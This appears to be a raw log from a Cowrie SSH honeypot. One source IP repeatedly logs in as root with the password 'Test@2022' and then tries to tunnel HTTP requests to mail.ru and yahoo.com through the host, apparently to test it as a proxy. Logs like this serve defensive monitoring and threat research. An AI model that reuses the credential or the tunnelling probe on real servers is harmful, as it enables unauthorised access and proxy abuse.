-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.063677Z","src_ip":"77.83.207.83","session":"a008d30eeb79"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.317034Z","src_ip":"77.83.207.83","session":"a008d30eeb79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18352,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18352","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.368834Z","session":"a008d30eeb79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.419717Z","src_ip":"77.83.207.83","session":"a008d30eeb79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":18623,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:18623","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.565255Z","session":"a008d30eeb79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.616527Z","src_ip":"77.83.207.83","session":"a008d30eeb79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":13197,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13197","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.761489Z","session":"a008d30eeb79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.812328Z","src_ip":"77.83.207.83","session":"a008d30eeb79"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.863961Z","src_ip":"77.83.207.83","session":"a008d30eeb79"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37543,"dst_ip":"1.2.3.4","dst_port":22,"session":"c81faaea24b5","protocol":"ssh","message":"New connection: 77.83.207.83:37543 (1.2.3.4:22) [session: c81faaea24b5]","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.913037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.923153Z","src_ip":"77.83.207.83","session":"c81faaea24b5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.963698Z","src_ip":"77.83.207.83","session":"c81faaea24b5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.213988Z","src_ip":"77.83.207.83","session":"c81faaea24b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21767,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21767","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.265099Z","session":"c81faaea24b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.315187Z","src_ip":"77.83.207.83","session":"c81faaea24b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":31898,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31898","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.456572Z","session":"c81faaea24b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.506611Z","src_ip":"77.83.207.83","session":"c81faaea24b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":2563,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2563","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.648940Z","session":"c81faaea24b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.699259Z","src_ip":"77.83.207.83","session":"c81faaea24b5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.750181Z","src_ip":"77.83.207.83","session":"c81faaea24b5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37627,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f0f3d27102c","protocol":"ssh","message":"New connection: 77.83.207.83:37627 (1.2.3.4:22) [session: 8f0f3d27102c]","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.799018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.799955Z","src_ip":"77.83.207.83","session":"8f0f3d27102c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.849648Z","src_ip":"77.83.207.83","session":"8f0f3d27102c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38576,"dst_ip":"1.2.3.4","dst_port":22,"session":"284d438b8be9","protocol":"ssh","message":"New connection: 212.227.125.160:38576 (1.2.3.4:22) [session: 284d438b8be9]","sensor":"my-vps","timestamp":"2025-08-31T03:44:00.895746Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.098029Z","src_ip":"77.83.207.83","session":"8f0f3d27102c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13909,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:13909","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.149639Z","session":"8f0f3d27102c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.199620Z","src_ip":"77.83.207.83","session":"8f0f3d27102c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":23114,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23114","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.340637Z","session":"8f0f3d27102c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.391318Z","src_ip":"77.83.207.83","session":"8f0f3d27102c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17450,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17450","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.532398Z","session":"8f0f3d27102c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.582283Z","src_ip":"77.83.207.83","session":"8f0f3d27102c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.633432Z","src_ip":"77.83.207.83","session":"8f0f3d27102c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37712,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cff4e1cd55c","protocol":"ssh","message":"New connection: 77.83.207.83:37712 (1.2.3.4:22) [session: 3cff4e1cd55c]","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.684008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.694166Z","src_ip":"77.83.207.83","session":"3cff4e1cd55c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.735054Z","src_ip":"77.83.207.83","session":"3cff4e1cd55c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:01.988702Z","src_ip":"77.83.207.83","session":"3cff4e1cd55c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":449,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:449","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.040439Z","session":"3cff4e1cd55c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.091134Z","src_ip":"77.83.207.83","session":"3cff4e1cd55c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26435,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:26435","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.233055Z","session":"3cff4e1cd55c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.283785Z","src_ip":"77.83.207.83","session":"3cff4e1cd55c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":8718,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8718","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.428983Z","session":"3cff4e1cd55c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.479649Z","src_ip":"77.83.207.83","session":"3cff4e1cd55c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.531324Z","src_ip":"77.83.207.83","session":"3cff4e1cd55c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37786,"dst_ip":"1.2.3.4","dst_port":22,"session":"438091df9f4d","protocol":"ssh","message":"New connection: 77.83.207.83:37786 (1.2.3.4:22) [session: 438091df9f4d]","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.580574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.581532Z","src_ip":"77.83.207.83","session":"438091df9f4d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.631959Z","src_ip":"77.83.207.83","session":"438091df9f4d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.882971Z","src_ip":"77.83.207.83","session":"438091df9f4d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24225,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24225","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.934988Z","session":"438091df9f4d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:02.985404Z","src_ip":"77.83.207.83","session":"438091df9f4d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":847,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:847","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.128882Z","session":"438091df9f4d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.179419Z","src_ip":"77.83.207.83","session":"438091df9f4d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":19820,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19820","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.320807Z","session":"438091df9f4d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.371268Z","src_ip":"77.83.207.83","session":"438091df9f4d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.422357Z","src_ip":"77.83.207.83","session":"438091df9f4d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37873,"dst_ip":"1.2.3.4","dst_port":22,"session":"42c3684bf1da","protocol":"ssh","message":"New connection: 77.83.207.83:37873 (1.2.3.4:22) [session: 42c3684bf1da]","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.471585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:03.481943Z","src_ip":"77.83.207.83","session":"42c3684bf1da"}
